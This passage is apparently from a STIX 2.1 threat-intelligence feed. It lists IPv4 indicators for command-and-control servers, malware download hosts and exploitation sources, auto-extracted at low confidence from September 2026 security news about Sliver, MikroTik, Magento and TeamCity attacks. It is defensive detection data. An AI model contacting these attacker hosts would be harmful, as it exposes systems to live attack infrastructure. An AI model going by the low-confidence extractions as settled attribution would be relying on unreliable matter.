News","url":"https://cybersecuritynews.com/hackers-disable-endpoint-protection/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--52347a2b-2043-4211-86ff-0f6c89b2792b","created":"2026-09-08T12:10:57.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 193.233.202.17","description":"Seen in \"Hackers Disable Endpoint Protection and Deploy Sliver Across Compromised Windows Domain\" (Cyber Security News). Context: compromise (IoCs):- Type Indicator Description IPv4 address 193.233.202.17 Primary Sliver command-and-control and staging-server addre","pattern":"[ipv4-addr:value = '193.233.202.17']","pattern_type":"stix","valid_from":"2026-09-08T12:10:57.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-disable-endpoint-protection/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c559eec4-9c16-4c76-8ffd-8b615b333c46","created":"2026-09-08T12:10:57.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 77.110.126.46","description":"Seen in \"Hackers Disable Endpoint Protection and Deploy Sliver Across Compromised Windows Domain\" (Cyber Security News). Context: command-and-control and staging-server address IPv4 address 77.110.126.46 Hardcoded third-tier fallback address, designated hunt-only","pattern":"[ipv4-addr:value = '77.110.126.46']","pattern_type":"stix","valid_from":"2026-09-08T12:10:57.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-disable-endpoint-protection/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--db737b2c-0811-4595-81b3-b6f8d6b8767e","created":"2026-09-08T11:36:48.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 99.84.67.186","description":"Seen in \"Adobe Commerce max-severity bug comes under active attack\" (CSO Online). Context: launched. This is a small Rust program that connects to the 99.84.67.186 C2 server and waits for commands,” Sansec researchers said","pattern":"[ipv4-addr:value = '99.84.67.186']","pattern_type":"stix","valid_from":"2026-09-08T11:36:48.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"CSO Online","url":"https://www.csoonline.com/article/4219626/adobe-commerce-max-severity-bug-comes-under-active-attack.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--13671a1d-9805-445b-aefb-af53ac0ff7c7","created":"2026-09-08T11:15:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 82.192.72.4","description":"Seen in \"MikroTik Patches Critical Flaws Chained to Hack Routers\" (SecurityWeek). Context: attacks have been originating from two IP addresses, namely 82.192.72.4 and 103.102.31.18. “The presence of any of these artifacts","pattern":"[ipv4-addr:value = '82.192.72.4']","pattern_type":"stix","valid_from":"2026-09-08T11:15:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/mikrotik-patches-critical-flaws-chained-to-hack-routers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7fec488e-6399-4d62-bc60-bba48daf8723","created":"2026-09-08T10:37:58.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 23.234.64.0","description":"Seen in \"N-able Patches Critical Zero-Day in N-central\" (SecurityWeek). Context: ctivity. We’ve observed scans originating from the IP range 23.234.64.0/18 attempting to exploit this vulnerability. Check your log","pattern":"[ipv4-addr:value = '23.234.64.0']","pattern_type":"stix","valid_from":"2026-09-08T10:37:58.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"SecurityWeek","url":"https://www.securityweek.com/n-able-patches-critical-zero-day-in-n-central/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--483df1d1-1aac-42f0-8ee4-582116da16ae","created":"2026-09-08T10:24:30.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 5.230.249.49","description":"Seen in \"HVNC Backdoor Targets LATAM Organizations with Fake Tax and DocuSign Lures\" (ANY.RUN). Context: : 02 19 05 04 07 19 05 03 0E 19 03 0E XOR key: 0x37 Result: 5.230.249.49 The destination port is stored in plaintext: 27015 – the de","pattern":"[ipv4-addr:value = '5.230.249.49']","pattern_type":"stix","valid_from":"2026-09-08T10:24:30.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"ANY.RUN","url":"https://any.run/cybersecurity-blog/hvnc-backdoor-targets-latam/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d8f2db17-445f-4f5a-9ff8-2ea2093f5b76","created":"2026-09-07T17:49:08.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 185.157.160.251","description":"Seen in \"StyleSmuggler: The Magento Zero-Day Behind New Store Attacks\" (Security Affairs). Context: TP-like domains and UDP port 123 destinations, particularly 185.157.160.251 , which Sansec linked to the observed domains on September","pattern":"[ipv4-addr:value = '185.157.160.251']","pattern_type":"stix","valid_from":"2026-09-07T17:49:08.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/198603/uncategorized/stylesmuggler-the-magento-zero-day-behind-new-store-attacks.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5c85d065-637c-4b17-aa59-9d8ee68b86a3","created":"2026-09-07T14:36:07.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 103.102.31.18","description":"Seen in \"⚡ Weekly Recap: Chrome 0-Day, Router Hijacks, Coder Supply Chain Attack and More\" (The Hacker News). Context: September,\" CERT Polska said. \"In addition, the IP address 103.102.31.18 was used in attempts to exploit the described chain.\" Unpat","pattern":"[ipv4-addr:value = '103.102.31.18']","pattern_type":"stix","valid_from":"2026-09-07T14:36:07.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/weekly-recap-chrome-0-day-router.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2529c793-7a0d-4e77-9bab-5dad71abcfe3","created":"2026-09-07T14:36:07.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 82.192.72.4","description":"Seen in \"⚡ Weekly Recap: Chrome 0-Day, Router Hijacks, Coder Supply Chain Attack and More\" (The Hacker News). Context: eation of the 'ops' account, originated from the IP address 82.192.72.4 and have been occurring since at least 2 September,\" CERT P","pattern":"[ipv4-addr:value = '82.192.72.4']","pattern_type":"stix","valid_from":"2026-09-07T14:36:07.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/weekly-recap-chrome-0-day-router.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0c1e94dd-2811-4e2f-8072-ea6b7250ed0c","created":"2026-09-07T10:32:40.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 103.102.31.18","description":"Seen in \"Hackers exploit new MikroTik RouterOS flaws to hijack routers\" (BleepingComputer). Context: ccount 82.192.72.4 — linked to confirmed successful attacks 103.102.31.18 — observed attempting to exploit MikroTrick If compromise i","pattern":"[ipv4-addr:value = '103.102.31.18']","pattern_type":"stix","valid_from":"2026-09-07T10:32:40.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-exploit-new-mikrotik-routeros-flaws-to-hijack-routers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--769da951-a0f5-4b75-a6d5-a2098a56c312","created":"2026-09-07T10:32:40.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 82.192.72.4","description":"Seen in \"Hackers exploit new MikroTik RouterOS flaws to hijack routers\" (BleepingComputer). Context: by ssh:-2@<ip>’ Presence of a highly privileged ops account 82.192.72.4 — linked to confirmed successful attacks 103.102.31.18 — ob","pattern":"[ipv4-addr:value = '82.192.72.4']","pattern_type":"stix","valid_from":"2026-09-07T10:32:40.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-exploit-new-mikrotik-routeros-flaws-to-hijack-routers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--34948cdf-c3cc-4f97-8e2e-bb4378a815c6","created":"2026-09-07T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 103.102.31.18","description":"Seen in \"Hackers exploit RouterOS flaws to hijack MikroTik devices without authentication\" (Help Net Security). Context: ince at least September 2, and it flagged a second address, 103.102.31.18, used in attempts to exploit the same chain. Patches and de","pattern":"[ipv4-addr:value = '103.102.31.18']","pattern_type":"stix","valid_from":"2026-09-07T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/07/mikrotik-routeros-ssh-vulnerabilities-exploited/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--666df526-67a7-456a-a320-17025e06f803","created":"2026-09-07T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 82.192.72.4","description":"Seen in \"Hackers exploit RouterOS flaws to hijack MikroTik devices without authentication\" (Help Net Security). Context: including creation of that “ops” account, to the IP address 82.192.72.4, active since at least September 2, and it flagged a second","pattern":"[ipv4-addr:value = '82.192.72.4']","pattern_type":"stix","valid_from":"2026-09-07T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/07/mikrotik-routeros-ssh-vulnerabilities-exploited/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7747062d-732e-4252-8212-4a430b5f82fc","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 150.109.230.104","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: P addresses associated with observed exploitation activity: 150.109.230.104 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205","pattern":"[ipv4-addr:value = '150.109.230.104']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b23fffab-7e74-4fff-b75e-6569de85667c","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 152.233.30.18","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205 152.233.30.18 Authentication or other activity from unexpected IP address","pattern":"[ipv4-addr:value = '152.233.30.18']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6a9a56d2-0d52-40a9-a054-5c4750696206","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 15.235.225.205","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: 50.109.230.104 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205 152.233.30.18 Authentication or other activity from unexpec","pattern":"[ipv4-addr:value = '15.235.225.205']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ab4d5da1-a44a-40b4-bc04-273d7a13bf74","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 210.247.242.190","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: tion activity: 150.109.230.104 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205 152.233.30.18 Authentication or other activi","pattern":"[ipv4-addr:value = '210.247.242.190']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f7e32726-c8c9-437f-9915-6bd77d1811fa","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 43.153.227.206","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: ciated with observed exploitation activity: 150.109.230.104 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205 152.233.30.18","pattern":"[ipv4-addr:value = '43.153.227.206']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--94a61c18-01ab-4f9e-bf1e-068e1bfe0d2c","created":"2026-09-05T16:52:33.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 62.210.127.48","description":"Seen in \"Attackers Breached JetBrains Cadence via Unpatched TeamCity, Extracting AWS Credentials\" (The Hacker News). Context: erved exploitation activity: 150.109.230.104 43.153.227.206 62.210.127.48 210.247.242.190 15.235.225.205 152.233.30.18 Authentication","pattern":"[ipv4-addr:value = '62.210.127.48']","pattern_type":"stix","valid_from":"2026-09-05T16:52:33.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-breached-jetbrains-cadence.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3da52d13-01f2-41c8-ac8c-5000535fe7c0","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 182.182.152.48","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: ces 88.216.72.181 attacker source, seen at multiple victims 182.182.152.48 attacker source 76.31.99.207 attacker source, failed exploi","pattern":"[ipv4-addr:value = '182.182.152.48']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9556b9eb-10ca-453c-9e79-0060bca49483","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 185.157.160.251","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: tember 7 that name, and ntp.timesysnc.net , both resolve to 185.157.160.251 , which is the address to block if you cannot filter by nam","pattern":"[ipv4-addr:value = '185.157.160.251']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7adf368a-2fef-416e-938d-f481542131fd","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 209.141.43.95","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: axfileupload/mag.txt 247.cdnflare.xyz malware download host 209.141.43.95 malware download host # C2 servers 99.84.67.186:443 C2, Web","pattern":"[ipv4-addr:value = '209.141.43.95']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--59390a2e-4218-4a53-a502-16945471827e","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 209.73.130.148","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: source 76.31.99.207 attacker source, failed exploit attempt 209.73.130.148 attacker source, successful exploit attempt 77.239.124.107","pattern":"[ipv4-addr:value = '209.73.130.148']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--120dd665-542b-45d2-883f-34489a3dc8b1","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 76.31.99.207","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: ce, seen at multiple victims 182.182.152.48 attacker source 76.31.99.207 attacker source, failed exploit attempt 209.73.130.148 atta","pattern":"[ipv4-addr:value = '76.31.99.207']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--26bf9fb7-a8f2-48e8-bef5-6d3f81d61ddc","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 77.239.124.107","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: 209.73.130.148 attacker source, successful exploit attempt 77.239.124.107 attacker source, follow-up requests User-Agent: python-requ","pattern":"[ipv4-addr:value = '77.239.124.107']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8baadbc1-545d-4e2b-8aed-284564b4437c","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 88.216.72.181","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: llback ntp.syncstime.to:123 C2, fallback # attacker sources 88.216.72.181 attacker source, seen at multiple victims 182.182.152.48 at","pattern":"[ipv4-addr:value = '88.216.72.181']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fc3b65d3-1f1d-4c34-af7a-ad2796729c00","created":"2026-09-05T00:00:00.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 99.84.67.186","description":"Seen in \"StyleSmuggler: Magento and Adobe Commerce 0-day RCE (CVE-2026-75650) under active attack\" (Sansec (Magento / e-commerce security)). Context: launched. This is a small Rust program that connects to the 99.84.67.186 C2 server and waits for commands. So far, we have no indica","pattern":"[ipv4-addr:value = '99.84.67.186']","pattern_type":"stix","valid_from":"2026-09-05T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Sansec (Magento / e-commerce security)","url":"https://sansec.io/research/stylesmuggler-0day"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--29fd29a5-8428-447b-97b9-689ba0f3816d","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 103.154.152.178","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: he following IP addresses - 103.168.147.235 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.","pattern":"[ipv4-addr:value = '103.154.152.178']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a61133e-135e-46e4-88ae-f751fb1a5b35","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 103.164.182.122","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious activity is said to have begun on","pattern":"[ipv4-addr:value = '103.164.182.122']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dd8e9a93-da48-4914-88a8-bd9162a11137","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 103.168.146.131","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: riginated from the following IP addresses - 103.168.147.235 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 12","pattern":"[ipv4-addr:value = '103.168.146.131']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--436f08ad-4234-479f-a590-9e45dfd952db","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 103.168.147.235","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: ms plugin have originated from the following IP addresses - 103.168.147.235 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51","pattern":"[ipv4-addr:value = '103.168.147.235']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--292b5a43-c08b-4ecc-8b17-b9369b9a1a78","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 103.170.97.7","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: addresses - 103.168.147.235 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 1","pattern":"[ipv4-addr:value = '103.170.97.7']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d9b23f14-0370-4b4b-865a-62ad2cec3e55","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 103.84.230.85","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: the below IP addresses - 2602:fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.1","pattern":"[ipv4-addr:value = '103.84.230.85']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--efa9c771-c83e-4573-a58a-e361eb358577","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 103.90.148.202","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: ddresses - 2602:fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.25","pattern":"[ipv4-addr:value = '103.90.148.202']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d27b46c-e636-4615-803b-a36f49c36009","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 114.10.17.253","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 3.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151 2406:ef80:2:7d19::1 WordPress site owners usi","pattern":"[ipv4-addr:value = '114.10.17.253']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6b79d48a-c8c1-4683-9710-857839390508","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 114.10.45.151","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 16.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151 2406:ef80:2:7d19::1 WordPress site owners using the two plu","pattern":"[ipv4-addr:value = '114.10.45.151']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker 